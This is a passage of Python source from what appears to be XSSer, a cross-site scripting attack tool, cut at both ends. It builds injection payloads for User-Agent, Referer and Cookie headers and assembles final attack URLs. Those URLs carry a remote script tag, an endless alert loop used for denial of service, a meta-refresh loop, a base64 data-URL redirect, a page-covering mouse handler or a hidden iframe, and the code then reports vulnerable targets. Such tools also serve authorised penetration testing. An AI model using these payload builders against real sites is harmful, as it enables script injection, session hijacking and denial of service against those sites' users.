 2956. all_urls.add(url)
 2957. else:
 2958. if self.options.crawling:
 2959. self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
 2960. else:
 2961. self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
 2962. url = None
 2963. else:
 2964. self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n")
 2965. return all_urls
 2966. def land(self, join=False):
 2967. self._landing = True
 2968. if self.hub:
 2969. self.hub.shutdown()
 2970. if join:
 2971. self.hub.join()
 2972. self.hub = None
 2973. def _prepare_extra_attacks(self, payload):
 2974. """
 2975. Setup extra attacks.
 2976. """
 2977. options = self.options
 2978. agents = [] # user-agents
 2979. try:
 2980. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
 2981. except:
 2982. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
 2983. for line in f:
 2984. agents.append(line)
 2985. extra_agent = random.choice(agents).strip() # set random user-agent
 2986. extra_referer = "127.0.0.1"
 2987. extra_cookie = None
 2988. if self.options.script:
 2989. if 'XSS' in payload['payload']:
 2990. payload['payload'] = payload['payload'].replace("XSS","PAYLOAD")
 2991. if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']:
 2992. if options.xsa:
 2993. hashing = self.generate_hash('xsa')
 2994. agent = payload['payload'].replace('PAYLOAD', hashing)
 2995. self._ongoing_attacks['xsa'] = hashing
 2996. self.xsa_injection = self.xsa_injection + 1
 2997. self.options.agent = agent
 2998. extra_agent = agent
 2999. self.extra_hashed_injections[hashing] = "XSA", payload['payload']
 3000. if options.xsr:
 3001. hashing = self.generate_hash('xsr')
 3002. referer = payload['payload'].replace('PAYLOAD', hashing)
 3003. self._ongoing_attacks['xsr'] = hashing
 3004. self.xsr_injection = self.xsr_injection + 1
 3005. self.options.referer = referer
 3006. extra_referer = referer
 3007. self.extra_hashed_injections[hashing] = "XSR", payload['payload']
 3008. if options.coo:
 3009. hashing = self.generate_hash('cookie')
 3010. cookie = payload['payload'].replace('PAYLOAD', hashing)
 3011. self._ongoing_attacks['coo'] = hashing
 3012. self.coo_injection = self.coo_injection + 1
 3013. self.options.cookie = cookie
 3014. extra_cookie = cookie
 3015. self.extra_hashed_injections[hashing] = "COO", payload['payload']
 3016. return extra_agent, extra_referer, extra_cookie
 3017. def attack(self, urls, payloads, query_string):
 3018. """
 3019. Perform an attack on the given urls with the provided payloads and
 3020. query_string.
 3021. """
 3022. for url in urls:
 3023. if self.pool:
 3024. self.poll_workers()
 3025. else:
 3026. self.mothership.poll_workers()
 3027. if not self._landing:
 3028. self.attack_url(url, payloads, query_string)
 3029. def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
 3030. """
 3031. Generate a real attack url using data from a successful test.
 3032. This method also applies DOM stealth mechanisms.
 3033. """
 3034. user_attack_payload = payload['payload']
 3035. if self.options.finalpayload:
 3036. user_attack_payload = self.options.finalpayload
 3037. elif self.options.finalremote:
 3038. user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
 3039. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
 3040. user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
 3041. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
 3042. user_attack_payload = self.options.finalpayload
 3043. if self.options.dos:
 3044. user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
 3045. if self.options.doss:
 3046. user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
 3047. if self.options.b64:
 3048. user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
 3049. if self.options.onm:
 3050. user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
 3051. if self.options.ifr:
 3052. user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
 3053. do_anchor_payload = self.options.anchor
 3054. anchor_data = None
 3055. attack_hash = None
 3056. if do_anchor_payload: # DOM Shadows!
 3057. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
 3058. dest_url = dest_url.replace('?', '#')
 3059. else:
 3060. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
 3061. if attack_hash:
 3062. self.final_attacks[attack_hash] = {'url':dest_url}
 3063. return dest_url
 3064. def token_arrived(self, attack_hash):
 3065. if not self.mothership: # only mothership calls on token arrival
 3066. self.final_attack_callback(attack_hash)
 3067. def final_attack_callback(self, attack_hash):
 3068. if attack_hash in self.final_attacks:
 3069. dest_url = self.final_attacks[attack_hash]['url']
 3070. for reporter in self._reporters:
 3071. reporter.add_checked(dest_url)
 3072. if self._reporter:
 3073. from twisted.internet import reactor
 3074. reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
 3075. def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
 3076. real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
 3077. return real_attack_url
 3078. def report(self, *args):
 3079. args = list([str(s) for s in args])
 3080. formatted = " ".join(args)
 3081. if not self.options.silent:
 3082. print(formatted)
 3083. for reporter in self._reporters:
 3084. reporter.post(formatted)
 3085. def print_results(self):
 3086. """
 3087. Print results from attack.
 3088. """
 3089. self.report('='*75)
 3090. total_injections = len(self.hash_found) + len(self.hash_notfound)
 3091. if len(self.hash_found) + len(self.hash_notfound) == 0:
 3092. pass
 3093. elif self.options.heuristic:
 3094. pass
 3095. else:
 3096. self.report("[*] Final Results:")
 3097. self.report('='*75 + '\n')
 3098. self.report("- Injections:", total_injections)
 3099. self.report("- Failed:", len(self.hash_notfound))
 3100. self.report("- Successful:", len(self.hash_found))
 3101. try:
 3102. _accur = len(self.hash_found) * 100 / total_injections
 3103. except ZeroDivisionError:
 3104. _accur = 0
 3105. self.report("- Accur: %s %%\n" % _accur)
 3106. if not len(self.hash_found) and self.hash_notfound:
 3107. self.report('='*75 + '\n')
 3108. pass
 3109. else:
 3110. self.report('='*75)
 3111. self.report("[*] List of XSS injections:")
 3112. self.report('='*75 + '\n')
 3113. if len(self.hash_found) > 1:
 3114. if len(self.token_arrived_hashes) > 0:
 3115. if len(self.hash_found) == len(self.token_arrived_hashes):
 3116. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] XSS vectors [100% VULNERABLE]! ;-)\n")
 3117. else:
 3118. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.token_arrived_hashes)) + " ] XSS [100% VULNERABLE] of [ " + str(len(self.hash_found)) + " ] possible XSS vectors! ;-)\n")
 3119. else:
 3120. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] possible XSS vectors! ;-)\n")
 3121. else:
 3122. if len(self.token_arrived_hashes) > 0:
 3123. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] XSS vector [100% VULNERABLE]! ;-)\n")
 3124. else:
 3125. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] possible XSS vector! ;-)\n")
 3126. self.report("---------------------" + "\n")
 3127. if self.options.fileoutput:
 3128. fout = open("XSSreport.raw", "w") # write better than append
 3129. for line in self.hash_found:
 3130. if self.options.heuristic or self.options.hash: # not final attack possible when checking
 3131. pass
 3132. else:
 3133. attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
 3134. if line[2] == "XSR":
 3135. self.xsr_found = self.xsr_found + 1
 3136. if len(self.hash_found) < 11:
 3137. if line[4]: # when query string
 3138. self.report("[+] Target:", line[6] + " | " + line[4])
 3139. else:
 3140. self.report("[+] Target:", line[6])
 3141. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3142. self.report("[!] Method: Referer Injection")
 3143. self.report("[*] Hash:", line[3])
 3144. self.report("[*] Payload:", str(Curl.referer))
 3145. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
 3146. if self.options.fileoutput:
 3147. fout.write("="*75)
 3148. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3149. fout.write("="*75 + "\n\n")
 3150. for h in self.hash_found:
 3151. if h[2] == "XSR":
 3152. if h[4]:
 3153. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
 3154. else:
 3155. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
 3156. fout.write("="*75 + "\n\n")
 3157. elif line[2] == "XSA":
 3158. self.xsa_found = self.xsa_found + 1
 3159. if len(self.hash_found) < 11:
 3160. if line[4]: # when query string
 3161. self.report("[+] Target:", line[6] + " | " + line[4])
 3162. else:
 3163. self.report("[+] Target:", line[6])
 3164. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3165. self.report("[!] Method: User-Agent Injection")
 3166. self.report("[*] Hash:", line[3])
 3167. self.report("[*] Payload:", str(Curl.agent))
 3168. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
 3169. if self.options.fileoutput:
 3170. fout.write("="*75)
 3171. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3172. fout.write("="*75 + "\n\n")
 3173. for h in self.hash_found:
 3174. if h[2] == "XSA":
 3175. if h[4]:
 3176. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
 3177. else:
 3178. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
 3179. fout.write("="*75 + "\n\n")
 3180. elif line[2] == "COO":
 3181. self.coo_found = self.coo_found + 1
 3182. if len(self.hash_found) < 11:
 3183. if line[4]: # when query string
 3184. self.report("[+] Target:", line[6] + " | " + line[4])
 3185. else:
 3186. self.report("[+] Target:", line[6])
 3187. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3188. self.report("[!] Method: Cookie Injection")
 3189. self.report("[*] Hash:", line[3])
 3190. self.report("[*] Payload:", str(Curl.cookie))
 3191. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
 3192. if self.options.fileoutput:
 3193. fout.write("="*75)
 3194. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3195. fout.write("="*75 + "\n\n")
 3196. for h in self.hash_found:
 3197. if h[2] == "COO":
 3198. if h[4]:
 3199. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
 3200. else:
 3201. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
 3202. fout.write("="*75 + "\n\n")
 3203. elif line[1] == "[Data Control Protocol Injection]":
 3204. self.dcp_found = self.dcp_found + 1
 3205. if len(self.hash_found) < 11:
 3206. if line[4]: # when query string
 3207. self.report("[+] Target:", line[6] + " | " + line[4])
 3208. else:
 3209. self.report("[+] Target:", line[6])
 3210. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3211. self.report("[!] Method: DCP")
 3212. self.report("[*] Hash:", line[3])
 3213. self.report("[*] Payload:", line[0])
 3214. self.report("[!] Vulnerable: DCP (Data Control Protocol)")
 3215. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3216. self.report("[*] Final Attack:", attack_url)
 3217. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
 3218. if self.options.fileoutput:
 3219. fout.write("="*75)
 3220. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3221. fout.write("="*75 + "\n\n")
 3222. for h in self.hash_found:
 3223. if h[4]:
 3224. if h[1] == "[Data Control Protocol Injection]":
 3225. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3226. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3227. else:
 3228. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
 3229. else:
 3230. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3231. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3232. else:
 3233. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
 3234. fout.write("="*75 + "\n\n")
 3235. elif line[1] == "[Document Object Model Injection]":
 3236. self.dom_found = self.dom_found + 1
 3237. if len(self.hash_found) < 11:
 3238. if line[4]: # when query string
 3239. self.report("[+] Target:", line[6] + " | " + line[4])
 3240. else:
 3241. self.report("[+] Target:", line[6])
 3242. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3243. self.report("[!] Method: DOM")
 3244. self.report("[*] Hash:", line[3])
 3245. self.report("[*] Payload:", line[0])
 3246. self.report("[!] Vulnerable: DOM (Document Object Model)")
 3247. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3248. self.report("[*] Final Attack:", attack_url)
 3249. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
 3250. if self.options.fileoutput:
 3251. fout.write("="*75)
 3252. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3253. fout.write("="*75 + "\n\n")
 3254. for h in self.hash_found:
 3255. if h[1] == "[Document Object Model Injection]":
 3256. if h[4]:
 3257. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3258. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3259. else:
 3260. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
 3261. else:
 3262. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3263. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3264. else:
 3265. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
 3266. fout.write("="*75 + "\n\n")
 3267. elif line[1] == "[Induced Injection]":
 3268. self.httpsr_found = self.httpsr_found +1
 3269. if len(self.hash_found) < 11:
 3270. if line[4]: # when query string
 3271. self.report("[+] Target:", line[6] + " | " + line[4])
 3272. else:
 3273. self.report("[+] Target:", line[6])
 3274. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3275. self.report("[!] Method: INDUCED")
 3276. self.report("[*] Hash:", line[3])
 3277. self.report("[*] Payload:", line[0])
 3278. self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)")
 3279. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3280. self.report("[*] Final Attack:", attack_url)
 3281. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
 3282. if self.options.fileoutput:
 3283. fout.write("="*75)
 3284. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3285. fout.write("="*75 + "\n\n")
 3286. for h in self.hash_found:
 3287. if h[4]:
 3288. if h[1] == "[Induced Injection]":
 3289. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3290. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3291. else:
 3292. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
 3293. else:
 3294. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3295. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3296. else:
 3297. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
 3298. fout.write("="*75 + "\n\n")
 3299. elif line[1] == "[hashing check]":
 3300. if len(self.hash_found) < 11:
 3301. if line[4]:
 3302. self.report("[+] Target:", line[6] + " | " + line[4])
 3303. else:
 3304. self.report("[+] Target:", line[6])
 3305. self.report("[+] Vector: [ " + str(line[3]) + " ]")
 3306. self.report("[!] Method:", line[2])
 3307. self.report("[*] Payload:", line[5])
 3308. self.report("[!] Status: HASH FOUND!", "\n", '-'*50, "\n")
 3309. if self.options.fileoutput:
 3310. fout.write("="*75)
 3311. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3312. fout.write("="*75 + "\n\n")
 3313. for h in self.hash_found:
 3314. if h[1] == "[hashing check]":
 3315. if h[4]:
 3316. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
 3317. else:
 3318. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
 3319. fout.write("="*75 + "\n\n")
 3320. elif line[1] == "[manual_injection]":
 3321. self.manual_found = self.manual_found + 1
 3322. if len(self.hash_found) < 11:
 3323. if line[4]: # when query string
 3324. self.report("[+] Target:", line[6] + " | " + line[4])
 3325. else:
 3326. self.report("[+] Target:", line[6])
 3327. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3328. self.report("[!] Method: MANUAL")
 3329. self.report("[*] Hash:", line[3])
 3330. self.report("[*] Payload:", line[0])
 3331. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3332. self.report("[*] Final Attack:", attack_url)
 3333. if self.token_arrived_flag == True:
 3334. self.report("[!] Status: XSS FOUND! [100% VULNERABLE]", "\n", '-'*50, "\n")
 3335. else:
 3336. if self.options.reversecheck:
 3337. self.report("[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]", "\n", '-'*50, "\n")
 3338. else:
 3339. self.report("[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]", "\n", '-'*50, "\n")
 3340. if self.options.fileoutput:
 3341. fout.write("="*75)
 3342. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3343. fout.write("="*75 + "\n\n")
 3344. for line in self.hash_found:
 3345. if line[4]:
 3346. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3347. if self.token_arrived_flag == True:
 3348. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3349. else:
 3350. if self.options.reversecheck:
 3351. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3352. else:
 3353. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3354. else:
 3355. if self.token_arrived_flag == True:
 3356. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3357. else:
 3358. if self.options.reversecheck:
 3359. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3360. else:
 3361. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3362. else:
 3363. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3364. if self.token_arrived_flag == True:
 3365. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3366. else:
 3367. if self.options.reversecheck:
 3368. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3369. else:
 3370. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3371. else:
 3372. if self.token_arrived_flag == True:
 3373. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3374. else:
 3375. if self.options.reversecheck:
 3376. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3377. else:
 3378. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3379. fout.write("="*75 + "\n\n")
 3380. elif line[1] == "[Heuristic test]":
 3381. if len(self.hash_found) < 11:
 3382. if line[4]:
 3383. self.report("[+] Target:", line[6] + " | " + line[4])
 3384. else:
 3385. self.report("[+] Target:", line[6])
 3386. self.report("[+] Vector: [ " + str(line[3]) + " ]")
 3387. self.report("[!] Method:", line[2])
 3388. self.report("[*] Payload:", line[5])
 3389. self.report("[!] Status: NOT FILTERED!", "\n", '-'*50, "\n")
 3390. if self.options.fileoutput:
 3391. fout.write("="*75)
 3392. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3393. fout.write("="*75 + "\n\n")
 3394. for line in self.hash_found:
 3395. if line[4]:
 3396. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
 3397. else:
 3398. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
 3399. fout.write("="*75 + "\n\n")
 3400. else:
 3401. self.auto_found = self.auto_found + 1
 3402. if len(self.hash_found) < 11:
 3403. if line[4]: # when query string
 3404. self.report("[+] Target:", line[6] + " | " + line[4])
 3405. else:
 3406. self.report("[+] Target:", line[6])
 3407. self.report("[+] Vector: [ " + str(line[2]) + " ]")
 3408. self.report("[!] Method: URL")
 3409. self.report("[*] Hash:", line[3])
 3410. self.report("[*] Payload:", line[0])
 3411. self.report("[!] Vulnerable:", line[1])
 3412. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3413. self.report("[*] Final Attack:", attack_url)
 3414. if self.token_arrived_flag == True:
 3415. self.report("[!] Status: XSS FOUND! [100% VULNERABLE]", "\n", '-'*50, "\n")
 3416. else:
 3417. if self.options.reversecheck:
